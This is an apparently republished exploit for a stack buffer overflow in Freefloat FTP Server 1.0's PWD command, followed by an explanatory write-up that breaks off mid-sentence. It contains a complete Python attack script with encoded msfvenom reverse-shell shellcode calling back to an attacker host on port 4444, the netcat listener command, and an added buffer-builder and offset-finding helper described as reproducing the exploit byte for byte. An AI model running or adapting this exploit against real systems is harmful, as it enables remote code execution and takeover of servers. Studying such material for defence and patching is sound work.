Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3
#!/usr/bin/env python3
import socket

# Metasploit shellcode: windows/shell_reverse_tcp, 351 bytes, encoded so that
# it contains neither of the bad characters listed below
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' -f python
# Listener on the attacker host: nc -lvp 4444
# Then send the exploit
# offset to the saved return address = 247 bytes
# badchars = \x00 \x0d
# return_address = \x3b\x69\x5a\x77, i.e. 0x775A693B in ole32.dll, little-endian
payload = (
    b"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
    b"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
    b"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
    b"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
    b"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
    b"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
    b"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
    b"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
    b"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
    b"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
    b"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
    b"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
    b"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
    b"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
    b"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
    b"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
    b"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
    b"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
    b"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
    b"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
    b"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
    b"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
    b"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
    b"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
    b"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
    b"\x19")

# filler up to the saved return address, the overwritten return address,
# a short NOP sled, then the shellcode (which is where ESP points after RET)
shellcode = b'A' * 247 + b"\x3b\x69\x5a\x77" + b'\x90' * 10 + payload


def main():
    ip = '192.168.146.135'
    port = 21
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    sock.recv(1024)                                 # banner
    sock.sendall(b'USER anonymous\r\n')
    sock.recv(1024)
    sock.sendall(b'PASS anonymous\r\n')
    sock.recv(1024)
    sock.sendall(b'pwd ' + shellcode + b'\r\n')     # oversized command triggers the overflow
    sock.close()


if __name__ == '__main__':
    main()

Freefloat FTP Server 1.0 'PWD' Remote Buffer Overflow: A Deep Dive into Exploitation and Mitigation
On August 22, 2023, an exploit was published for Freefloat FTP Server 1.0 that targets the PWD (Print Working Directory) command. Written by Waqas Ahmed Faroouqi (ZEROXINN), it abuses a stack-based buffer overflow in the server's command handling to execute arbitrary code remotely. The exploit was tested on Windows XP SP3, a legacy operating system that remains in use in isolated environments; it relies on ole32.dll loading at a fixed address and on the stack being executable, both of which hold on a default XP SP3 install (XP has no ASLR, and DEP there is opt-in for non-system processes), which makes the technique reliable against such outdated infrastructure.
Understanding the Vulnerability: Buffer Overflow in FTP Commands
A buffer overflow occurs when an application copies input into a fixed-size buffer without checking that it fits, so the excess bytes overwrite whatever lies beyond the buffer. Freefloat FTP Server copies the text of an incoming command line into such a buffer without a length check; PWD is simply the command verb this exploit uses to deliver the oversized line.
Because the buffer lives on the stack, bytes written past its end run into the saved return address of the function processing the command. The exploit fills the buffer with 247 bytes of padding, replaces the return address with an address of the attacker's choosing, and places a NOP sled and shellcode immediately after it; when the function returns, execution is redirected to that address and from there into the shellcode.
Exploit Mechanics: Step-by-Step Breakdown
The exploit leverages the following components:
- Target server: Freefloat FTP Server 1.0, running on Windows XP SP3.
- Exploit command: PWD, a standard FTP command that normally takes no argument and returns the current directory.
- Attack vector: a PWD request followed by an argument far longer than the server's command buffer.
- Shellcode: an msfvenom-generated windows/shell_reverse_tcp payload that connects back to the attacker and spawns a shell.
- Return address: \x3b\x69\x5a\x77 (0x775A693B written little-endian), an address inside ole32.dll. Windows XP has no ASLR, so ole32.dll loads at the same base on every run of the same build and the address is stable. The layout of the buffer (NOP sled and shellcode placed right after the return address, exactly where ESP points once RET has executed) implies that this address holds an instruction that transfers control to ESP, such as JMP ESP.
Exploit Code Analysis
The exploit script at the top of this page performs the following steps:
- Establishes a TCP connection to the FTP server on port 21.
- Authenticates as anonymous/anonymous by sending USER and PASS; the overflowing command is sent only after the login exchange.
- Sends a PWD command whose argument is built from:
  - 247 bytes of 'A' characters, filling the buffer up to the saved return address.
  - The return address \x3b\x69\x5a\x77, pointing into ole32.dll.
  - A 10-byte NOP sled (0x90 repeated ten times), giving execution a safe landing zone before the shellcode.
  - The msfvenom-generated shellcode, which opens a reverse TCP connection back to 192.168.146.134:4444, where the attacker's listener (nc -lvp 4444) is waiting.
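To make that layout concrete, the following Python 3 code is an added example and not part of the original exploit: it rebuilds the same buffer, models the vulnerable stack frame to show which four bytes become the new return address and where ESP lands after RET, checks hand-made parts of the buffer for the two bad characters, and shows how an offset such as 247 is found from a crash with a Metasploit-style cyclic pattern. The offset, return address and bad characters are the exploit's own; the 8-byte INT3 stand-in for the shellcode is constructed here so the example runs offline.

```python
"""Added example: layout checker for the overflow buffer used by the exploit
on this page.  Not part of the original exploit; the offset, return address
and bad characters are taken from it, the shellcode stand-in is constructed."""
import struct

OFFSET = 247                 # filler bytes before the saved return address
RET_ADDR = 0x775A693B        # ole32.dll address; little-endian bytes \x3b\x69\x5a\x77
NOP_SLED = 10                # NOPs between return address and shellcode
BAD_CHARS = b"\x00\x0d"      # \x00 ends a C string copy, \x0d ends the FTP command line


def cyclic_pattern(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique
    within the first 20280 bytes, so the value found in EIP after a crash
    maps back to exactly one offset."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """Map the EIP seen in the debugger (as an int) back to the offset of
    those four bytes in the pattern; -1 if the crash did not come from it."""
    return pattern.find(struct.pack("<I", eip_value))


def check_bad_chars(data, bad=BAD_CHARS):
    """Offsets of every forbidden byte in data; an empty list means clean.
    msfvenom -b keeps them out of the shellcode, but the filler, return
    address and NOP sled are hand-made and must be checked separately."""
    return [i for i, byte in enumerate(data) if byte in bad]


def build_buffer(shellcode, offset=OFFSET, ret_addr=RET_ADDR, nops=NOP_SLED):
    """Same layout as the exploit: filler + return address + NOP sled + shellcode."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode


def ftp_command_line(verb, argument):
    """Wrap the buffer in an FTP command line, refusing an argument that
    contains a bad character (a CR would end the line early, a NUL would
    end the copy early, and the bytes after it would never reach the stack)."""
    if check_bad_chars(argument):
        raise ValueError("argument contains a bad character")
    return verb + b" " + argument + b"\r\n"


def saved_return_address(buffer, offset=OFFSET):
    """Model of the vulnerable frame: a fixed buffer of `offset` bytes with
    the saved return address right after it.  Returns the value RET will pop
    into EIP, or None when the input is short enough not to reach it."""
    if len(buffer) < offset + 4:
        return None
    return struct.unpack("<I", buffer[offset:offset + 4])[0]


def esp_after_ret(buffer, offset=OFFSET):
    """Bytes ESP points at once RET has popped the return address; a JMP ESP
    style gadget at RET_ADDR lands execution here, on the NOP sled."""
    return buffer[offset + 4:]


if __name__ == "__main__":
    shellcode = b"\xcc" * 8   # constructed stand-in: INT3 breakpoints, not real shellcode
    buf = build_buffer(shellcode)
    line = ftp_command_line(b"pwd", buf)
    print("command line length:", len(line))
    print("EIP after RET: 0x%08x" % saved_return_address(buf))
    print("ESP lands on:", esp_after_ret(buf)[:NOP_SLED + len(shellcode)].hex())
    print("bad chars in buffer:", check_bad_chars(buf))
    # how an offset like 247 is found: crash with a pattern, read EIP, look it up
    pattern = cyclic_pattern(600)
    crash_eip = struct.unpack("<I", pattern[OFFSET:OFFSET + 4])[0]  # what the debugger shows
    print("pattern offset:", pattern_offset(pattern, crash_eip))
```

Running it prints the 0x775A693B that RET will load into EIP, the NOP sled followed by the stand-in shellcode at ESP, an empty bad-character list, and 247 as the offset recovered from the pattern. Swapping the stand-in for the real msfvenom payload from the script above reproduces the exploit's buffer byte for byte, and check_bad_chars over the whole buffer is the sanity check to run before sending anything to a target.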
Once the server processes the malformed PWD command, the buffer overflow triggers, corrupting the stack and redirecting